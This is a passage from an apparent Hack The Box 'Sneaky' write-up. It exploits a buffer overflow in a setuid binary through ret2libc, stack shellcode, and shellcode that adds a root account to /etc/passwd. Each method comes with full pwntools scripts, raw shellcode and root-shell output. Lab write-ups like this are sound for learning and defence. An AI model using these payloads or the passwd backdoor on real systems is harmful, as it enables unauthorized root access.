Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0x0 ECX: 0xffffd780 ("%YA%wA%ZA%xA%y") EDX: 0xffffd424 ("%YA%wA%ZA%xA%y") ESI: 0xf7fa1000 --> 0x1dfd6c EDI: 0xf7fa1000 --> 0x1dfd6c EBP: 0x41712541 ('A%qA') ESP: 0xffffd410 ("rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y") EIP: 0x25415525 ('%UA%') EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x25415525 [------------------------------------stack-------------------------------------] 0000| 0xffffd410 ("rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y") 0004| 0xffffd414 ("A%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y") 0008| 0xffffd418 ("%WA%uA%XA%vA%YA%wA%ZA%xA%y") 0012| 0xffffd41c ("uA%XA%vA%YA%wA%ZA%xA%y") 0016| 0xffffd420 ("A%vA%YA%wA%ZA%xA%y") 0020| 0xffffd424 ("%YA%wA%ZA%xA%y") 0024| 0xffffd428 ("wA%ZA%xA%y") 0028| 0xffffd42c ("A%xA%y") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x25415525 in ?? ()
gdb-peda$ pattern_offset 0x25415525 625038629 found at offset: 362
As expected the overflow offset is after 362 bytes.
Call system function
The first solution tried was to call the system function from glic. The ASLR is not enabled, so this solution should be easy to apply.
thrasivoulos@Sneaky:/tmp$ ldd /usr/local/bin/chal
linux-gate.so.1 => (0xb7ffe000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e44000)
/lib/ld-linux.so.2 (0x80000000)
We have the glibc base address.
thrasivoulos@Sneaky:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
system function offset.
thrasivoulos@Sneaky:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
exit function offset.
thrasivoulos@Sneaky:/tmp$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
162bac /bin/sh
/bin/sh string offset.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_target.py #!/usr/bin/python
from pwn import *
junk = 'D'*362
glibcbase=0xb7e44000 systemoffset=0x00040310 exitoffset=0x00033260 binshoffset=0x162bac systemaddr=glibcbase+systemoffset exitaddr=glibcbase+exitoffset binshaddr=glibcbase+binshoffset log.info("systemaddr 0x%x" % systemaddr) log.info("exitaddr 0x%x" % exitaddr) log.info("binshaddr 0x%x" % binshaddr) payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
file = open("payload","w") file.write (payload) file.close()
The exploit calls system and provides the exit function as return and the string /bin/sh as argument.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_target.py [*] systemaddr 0xb7e84310 [*] exitaddr 0xb7e77260 [*] binshaddr 0xb7fa6bac
We transfer the payload to the target.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/ payload 100% 374 9.4KB/s 00:00
We try the exploit.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload` Segmentation fault (core dumped)
But it fails. So I decided to try to find an other way to find the correct addresses.
thrasivoulos@Sneaky:/tmp$ gdb /usr/local/bin/chal -q /lib/i386-linux-gnu/libc.so.6 Reading symbols from /usr/local/bin/chal...(no debugging symbols found)...done. "/lib/i386-linux-gnu/libc.so.6" is not a core dump: File format not recognized (gdb) disassemble main Dump of assembler code for function main: 0x0804841d <+0>: push %ebp 0x0804841e <+1>: mov %esp,%ebp 0x08048420 <+3>: and $0xfffffff0,%esp 0x08048423 <+6>: sub $0x170,%esp 0x08048429 <+12>: mov 0xc(%ebp),%eax 0x0804842c <+15>: add $0x4,%eax 0x0804842f <+18>: mov (%eax),%eax 0x08048431 <+20>: mov %eax,0x4(%esp) 0x08048435 <+24>: lea 0x12(%esp),%eax 0x08048439 <+28>: mov %eax,(%esp) 0x0804843c <+31>: call 0x80482f0 <strcpy@plt> 0x08048441 <+36>: mov $0x0,%eax 0x08048446 <+41>: leave 0x08048447 <+42>: ret End of assembler dump. (gdb) br *0x08048447 Breakpoint 1 at 0x8048447 (gdb) r `cat payload` Starting program: /usr/local/bin/chal `cat payload`
Breakpoint 1, 0x08048447 in main () (gdb) print system $1 = {<text variable, no debug info>} 0xb7e62310 <__libc_system> (gdb) print exit $2 = {<text variable, no debug info>} 0xb7e55260 <__GI_exit>
The system and exit addresses are different comparing to the ones computed before.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_target2.py #!/usr/bin/python
from pwn import *
junk = 'D'*362
systemaddr=0xb7e62310
systemoffset=0x00040310 exitoffset=0x00033260 binshoffset=0x162bac glibcbase=systemaddr-systemoffset exitaddr=glibcbase+exitoffset binshaddr=glibcbase+binshoffset log.info("glibcbase 0x%x" % glibcbase) log.info("systemaddr 0x%x" % systemaddr) log.info("exitaddr 0x%x" % exitaddr) log.info("binshaddr 0x%x" % binshaddr) payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
file = open("payload","w") file.write (payload) file.close()
We compute the new payload.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_target2.py
[*] glibcbase 0xb7e22000
[*] systemaddr 0xb7e62310
[*] exitaddr 0xb7e55260
[*] binshaddr 0xb7f84bac
We copy the new payload.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/ payload 100% 374 9.5KB/s 00:00
And now, it works correctly, we gain root prompt.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
I don't know why the utility ldd is providing the incorrect address.
Alternative code shell execution
The NX is not enabled, so we should be able to insert shell code in the stack, and call it.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_shellcode.py #!/usr/bin/python
from pwn import *
eip = 0xdeadc0de shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
padding_len = 362 - len(shellcode)
payload= '\x90' * padding_len + shellcode + p32(eip) file = open("payload","w") file.write (payload) file.close()
The strategy is insert the shell code at the end of the 362 bytes, and padding on the right with No Operation instructions (NOP \x90). Because we control the EIP register, we can call our shell code on our stack. The problem is that we don't the address of the code on the stack. But gdb is installed on the target machine, so we run a first time, the payload with a work address, and analyze the stack status and extract a valid address.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_shellcode.py u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/ payload 100% 366 9.3KB/s 00:00
We run it on gdb.
thrasivoulos@Sneaky:/tmp$ gdb /usr/local/bin/chal GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from /usr/local/bin/chal...(no debugging symbols found)...done. (gdb) r `cat payload` Starting program: /usr/local/bin/chal `cat payload`
Program received signal SIGSEGV, Segmentation fault. 0xdeadc0de in ?? () (gdb) x/100x $esp-400 0xbffff3f0: 0xbffff412 0x00000000 0x00000000 0x08048441 0xbffff400: 0xbffff412 0xbffff74c 0x0804821d 0xb7fffc24 0xbffff410: 0x909018fc 0x90909090 0x90909090 0x90909090 0xbffff420: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff430: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff440: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff450: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff460: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff470: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff480: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4d0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4e0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4f0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff500: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff510: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff520: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff530: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff540: 0x90909090 0x90909090 0x90909090 0xeb909090 0xbffff550: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c ---Type <return> to continue, or q <return> to quit--- 0xbffff560: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8 0xbffff570: 0xffffdce8 0x69622fff 0x68732f6e 0xdeadc0de
As expected, the program crashes on 0xdeadc0de. I we take a look at the stack 400 bytes before the crash, we find our NOP code (0x90 in green), followed by our shell code (in blue), and our 0xdeadc0de address in red. The stack address can vary slightly, so we will redirect our EIP pointer to the first part of the NOP instructions. For example to the address 0xbffff440.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_shellcode.py #!/usr/bin/python
from pwn import *
#eip = 0xdeadc0de eip = 0xbffff440 shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
padding_len = 362 - len(shellcode)
payload= '\x90' * padding_len + shellcode + p32(eip) file = open("payload","w") file.write (payload) file.close()
We generate the payload, and copy it to the target.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_shellcode.py u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/ payload 100% 366 9.4KB/s 00:00
From the target.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
Alternative shell code injection to add a line in /etc/passwd
Instead of spawning a shell, we can add a line in /etc/passwd. This method should work on OS where dash fallback to the real user instead of the effective user when they are different. We use the shellcode from http://shell-storm.org/shellcode/files/shellcode-407.php and adapted it to our needs.
We generate the line for a new user u5 with the password hello.
u505@kali:~/HTB/Machines/Sneaky$ echo "u5:`openssl passwd hello`:0:0::/:/bin/sh" > etcpasswdline u505@kali:~/HTB/Machines/Sneaky$ cat etcpasswdline u5:LNoj5WDjudtqo:0:0::/:/bin/sh u505@kali:~/HTB/Machines/Sneaky$ xxd etcpasswdline 00000000: 7535 3a4c 4e6f 6a35 5744 6a75 6474 716f u5:LNoj5WDjudtqo 00000010: 3a30 3a30 3a3a 2f3a 2f62 696e 2f73 680a :0:0::/:/bin/sh.
We adapt the shell code to insert our line in /etc/passwd.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_shellroot.py #!/usr/bin/python
from pwn import *
#eip = 0xdeadc0de eip = 0xbffff440
shellcode= "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x75\x35\x3a\x4c\x4e\x6f\x6a\x35\x57\x44\x6a\x75\x64\x74\x71\x6f\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68"
padding_len = 362 - len(shellcode)
payload= '\x90' * padding_len + shellcode + p32(eip) file = open("payload","w") file.write (payload) file.close()
We generate the payload
u505@kali:~/HTB/Machines/Sneaky$ python exploit_shellroot.py u505@kali:~/HTB/Machines/Sneaky$ xxd payload 00000000: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000010: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000020: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000030: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000040: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000050: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000060: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000070: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000080: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000090: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 000000f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 00000100: eb03 5feb 05e8 f8ff ffff 31db b335 01fb .._.......1..5.. 00000110: 30c0 8843 0b31 c966 b941 0431 d266 baa4 0..C.1.f.A.1.f.. 00000120: 0131 c0b0 05cd 8089 c331 c9b1 4101 f931 .1.......1..A..1 00000130: d2b2 1f31 c0b0 04cd 8031 c0b0 01cd 802f ...1.....1...../ 00000140: 6574 632f 7061 7373 7764 0175 353a 4c4e etc/passwd.u5:LN 00000150: 6f6a 3557 446a 7564 7471 6f3a 303a 303a oj5WDjudtqo:0:0: 00000160: 3a2f 3a2f 6269 6e2f 7368 40f4 ffbf :/:/bin/sh@...
We transfer the payload to the target machine.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
On the target machine, the end of the passwd file.
thrasivoulos@Sneaky:/tmp$ tail /etc/passwd gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false landscape:x:103:109::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin thrasivoulos:x:1000:1000:thrasivoulos,,,:/home/thrasivoulos:/bin/bash snmp:x:105:113::/var/lib/snmp:/bin/false mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
Execution of the exploit.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
Our line is inserted in the passwd file.
thrasivoulos@Sneaky:/tmp$ tail /etc/passwd
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
thrasivoulos:x:1000:1000:thrasivoulos,,,:/home/thrasivoulos:/bin/bash
snmp:x:105:113::/var/lib/snmp:/bin/false
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
u5:LNoj5WDjudtqo:0:0::/:/bin/sh
Now, we can su the our created user, with the password we know.
thrasivoulos@Sneaky:/tmp$ su - u5 Password: # id uid=0(root) gid=0(root) groups=0(root) # bash root@Sneaky:/# id uid=0(root) gid=0(root) groups=0(root)
Our user is a real root user, we can even launch a bash session.
Root Flag
# cat /root/root.txt <ROOT_FLAG>
References
- https://github.com/nnamon/linux-exploitation-course/blob/master/lessons/4_classic_exploitation/lessonplan.md
- Smashing The Stack For Fun And Profit Aleph One
- http://shell-storm.org/shellcode/
Daniel Simao 09:36, 3 May 2020 (EDT)
